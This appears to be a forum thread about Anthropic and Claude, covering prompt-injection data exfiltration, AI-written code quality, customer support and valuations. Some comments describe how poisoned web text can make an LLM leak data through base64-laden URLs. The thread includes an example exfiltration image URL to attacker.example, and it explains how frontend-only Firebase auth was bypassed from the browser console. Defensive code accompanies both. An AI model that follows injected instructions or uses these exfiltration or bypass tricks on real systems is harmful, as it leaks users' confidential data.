It might be lower stakes, but isn't that still a juicy target for data-exfiltration attacks?
In other words, imagine if one of your direct competitors was watching everything your employee read while making spreadsheets and slideshows.
Maliciously constructed text that reaches the LLM from basically anywhere (including, say, stats about a competitor's product fetched from their website) is a potential source of prompt injection.
Once that happens, exfiltration can be as simple as generating a spreadsheet or doc containing a link or a small auto-loaded image whose URL has the data base64'ed into it.
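To make that channel concrete from the defender's side, here is a minimal Python sketch that scans LLM-generated document text for URLs whose path or query carries a long base64-looking payload. It is a heuristic under stated assumptions, not a product feature: the names `suspicious_urls`, `B64_RUN` and the 24-character threshold are hypothetical choices made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Hypothetical heuristic: a "base64-looking" run is 24+ characters from the
# standard or URL-safe base64 alphabet, optionally followed by '=' padding.
# The 24-character threshold is an arbitrary assumption, not a standard.
B64_RUN = re.compile(r"[A-Za-z0-9+/_-]{24,}={0,2}")

# Crude URL matcher; stops at whitespace, quotes, angle brackets and ')'
# so that Markdown links like [x](https://...) are captured cleanly.
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def _is_b64ish(token: str) -> bool:
    """True if token contains a long run mixing upper case, lower case and digits."""
    for match in B64_RUN.finditer(token):
        run = match.group()
        if (any(c.isupper() for c in run)
                and any(c.islower() for c in run)
                and any(c.isdigit() for c in run)):
            return True
    return False


def suspicious_urls(text: str) -> list[str]:
    """Return URLs in `text` whose path segments or query values contain a base64-looking run."""
    flagged = []
    for url in URL_RE.findall(text):
        parsed = urlparse(url)
        # Inspect path segments and decoded query values; the hostname is ignored.
        parts = parsed.path.split("/") + [value for _, value in parse_qsl(parsed.query)]
        if any(_is_b64ish(part) for part in parts):
            flagged.append(url)
    return flagged
```

Running `suspicious_urls` over a generated doc containing something like `![chart](https://attacker.example/pixel.png?d=U2VjcmV0IFEzIG1hcmdpbiBmaWd1cmVzOiAxMiU=)` flags that image URL, while an ordinary link such as `https://example.com/docs/getting-started?page=2` passes. A check like this is easy to evade (hex encoding, short chunks spread over many requests), so simply refusing to auto-load external images in generated documents is the sturdier choice.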
The work BigIP is doing on LLM traffic analysis is cool though.
1. It costs nothing to scatter poisonous data around that'll be infectious for ages
2. Running the exfiltrated-data endpoint is low-traffic and low-complexity
3. Even if it only affects a few targets you've probably recouped your investment.
The nature of LLMs also invites wide-net attacks. While one might tailor an attack to specific models, the victims could be anybody. You don't need to predict idiosyncratic details like filenames: you can drop a phrase like "the most-confidential information that shouldn't be released publicly", and, thanks to the magic of LLM word association, you'll get a pretty good hit rate. Hallucinations are a problem, but victims are already hard at work trying to minimize them, and (since morals are already out the window) even plausible-but-false data could be used to sabotage reputations or to threaten the same.
If AI is really as wondrous as everybody says, why didn't all the employees of all the AI companies simply type "Claude, file my taxes for me" as a prompt and walk away?
If you're not yet waking up to AI completing tasks for you that you didn't directly ask for, you might be falling behind the curve. A good personal assistant does what you ask, a better personal assistant knows what you need before you do and has it completed before you reach your desk. AI is already starting to reach into the latter category.
(edit: dialled back some unnecessary snark.)
Luckily there is still a significant market for the services.
Currently we don't know the risk, so it is kind of hard to absorb.
Why, they can sell user data to other brokers. Experts indeed! But not in insurance or finance, of course.
But there's a process risk here based on their current practices. I'm hoping those practices change so that I can recommend Claude to everyone I know, but as of now, there's existential risk exposure here that's greater than Google's.
Anthropic's automated systems can and will ban you for pretty arbitrary things, and you won't get human support or Claude – even if you are an enterprise paying through the nose. And there's zero redressal unless you go viral on social media. Or know someone who knows someone. See: https://x.com/Whizz_ai/status/2051180043355967802 https://x.com/theo/status/2045618854932734260
And I say that as someone who likes how Anthropic has been training Claude and Opus. I just don't think they're prepared to be the trillion dollar company they've become. They are – in a very real way – suffering from success. Which is extremely inconvenient to be on the receiving end of when you're on a deadline.
Code review has become unbearable because, before AI, developers were reviewing code as they wrote it in the first place. Granted, that was never perfect, which is why having a second person review code was (is?) a best practice. But effectively there was always some level of code review happening as developers wrote code.
I fear it is way more boring to review financial and medical documents written entirely by AI than it is to write (and simultaneously review) them yourself. And shipping mistakes there is way more dangerous than in most software.
But more often than not that developer ends up reviewing far more lines of code due to the typical verbosity of an LLM.
The analysis itself, I'm doing by hand.
Far too often people think productivity is the point. Maybe the point is that the developer's understanding of the product IS the product?
You're not engineering black boxes, you're engineering legible boxes.
For example, Codex can review code written by Claude, etc.
Here are some of the horrible things I've seen. A frontend dashboard with PHI/PII deployed via Vercel/Next.js because AI told them how to get their site online. The login is hardcoded into the frontend, so anyone with the browser's inspect tool can find the password.
Another "fixed" dashboard, deployed the same way. This time they added Firebase Auth, so they had Sign in with Google restricted to our domain. Wait, how would they be able to create a token restricted to our domain? They didn't: the frontend just blocks other domains from calling firebase.auth, but Firebase doesn't care. So simply calling the function from the console lets me log in with any Gmail account...
They were also showing me their RBAC with Firebase. Again, they don't have access to our Organization/Directory/Groups, so I wondered how they did this... wouldn't you know it, it's a hardcoded list of approved users. You can literally call firebase.auth and sign in anonymously. Again, only the frontend checks the email addresses. And once I have any Firebase auth, all the backend Firebase functions just check that you have authenticated. So I can make any request I want to the backend. The frontend simply won't show me the code.
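The common failure in these dashboards is that authentication and authorization live only in the frontend. Below is a minimal Python sketch of moving the domain and role checks to the backend, assuming the ID token has already been verified server-side (for example with the Firebase Admin SDK's `auth.verify_id_token`) and its decoded claims are passed in. `ALLOWED_DOMAIN`, `ROLE_BY_EMAIL`, `authorize` and `Forbidden` are hypothetical names; a real role store would be a database or directory, not a dict.

```python
from typing import Any, Mapping

# Hypothetical configuration: replace with your real organization domain.
ALLOWED_DOMAIN = "example.com"

# Hypothetical server-side role store. The point is that it lives on the
# backend, not in frontend code where anyone can read or bypass it.
ROLE_BY_EMAIL = {"alice@example.com": "admin", "bob@example.com": "viewer"}
ROLE_RANK = {"viewer": 1, "admin": 2}


class Forbidden(Exception):
    """Raised when a verified token is not allowed to perform the request."""


def authorize(claims: Mapping[str, Any], required_role: str) -> str:
    """Check already-verified ID token claims on the server; return the caller's email.

    `claims` is assumed to be the dict produced by server-side token
    verification; this function does not check signatures itself.
    """
    # Reject anonymous and other providers: only Google sign-in is accepted here.
    provider = claims.get("firebase", {}).get("sign_in_provider")
    if provider != "google.com":
        raise Forbidden(f"sign-in provider {provider!r} not allowed")

    email = str(claims.get("email", "")).lower()
    if not claims.get("email_verified", False):
        raise Forbidden("email not verified")
    # The leading '@' stops look-alikes such as user@notexample.com.
    if not email.endswith("@" + ALLOWED_DOMAIN):
        raise Forbidden("email outside the allowed domain")

    # Role lookup and comparison happen server-side, on every request.
    role = ROLE_BY_EMAIL.get(email)
    if role is None or ROLE_RANK[role] < ROLE_RANK[required_role]:
        raise Forbidden(f"{email} lacks role {required_role!r}")
    return email
```

Each backend function would call something like `authorize(claims, "viewer")` before touching data; any check left in the frontend is only there for UX, since the console can bypass it.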
I could go on and on about the stupidity levels I'm facing but I don't feel like crashing out.
All I can say is this tool is only useful if you already know how to implement these things correctly. Does it save me time? Sure, but I have to call it dumb and explain why not to do things. Honestly, I feel like Claude is good for people who like to gamble. When it gets it right it feels great, but I don't want to roll the dice 30 times to get it correct.
Sadly, this sounds like par for the course when it comes to tech. Too many messages and requests for help depend on knowing someone in the right Slack groups.
At least, that's the message this sends, in my opinion.
You're a funny one aren't you...
Meet "Fin", Anthropic's "where support questions go to die" so-called support bot, created by Intercom but powered by Anthropic.
Maybe it's an internal in-joke in the Anthropic offices... "Fin" in French means "end".
I don't know anyone who has had a positive experience with "Fin", or who has ever spoken to a human at Anthropic support for that matter, even after asking "Fin" to escalate.
Customer support and safety are cost centers. It doesn’t scale like software does and no one’s KPIs are going to improve dramatically if you provide support beyond a point.
AI and LLMs are the cool tech, and the most important thing is to push the frontier. Money spent elsewhere is money not spent on R&D.
It would be hilarious if it wasn’t the GDPs of nations being spent on this.
It also makes no sense to me that there are people qualified to participate in these secondary markets who are that stupid, but here we are.
And participating there isn't gated by "a qualification that allows you to enter"; it's based on other metrics.
If Anthropic's valuation makes no sense, fair enough, but then why is OpenAI's valuation of $850B correct?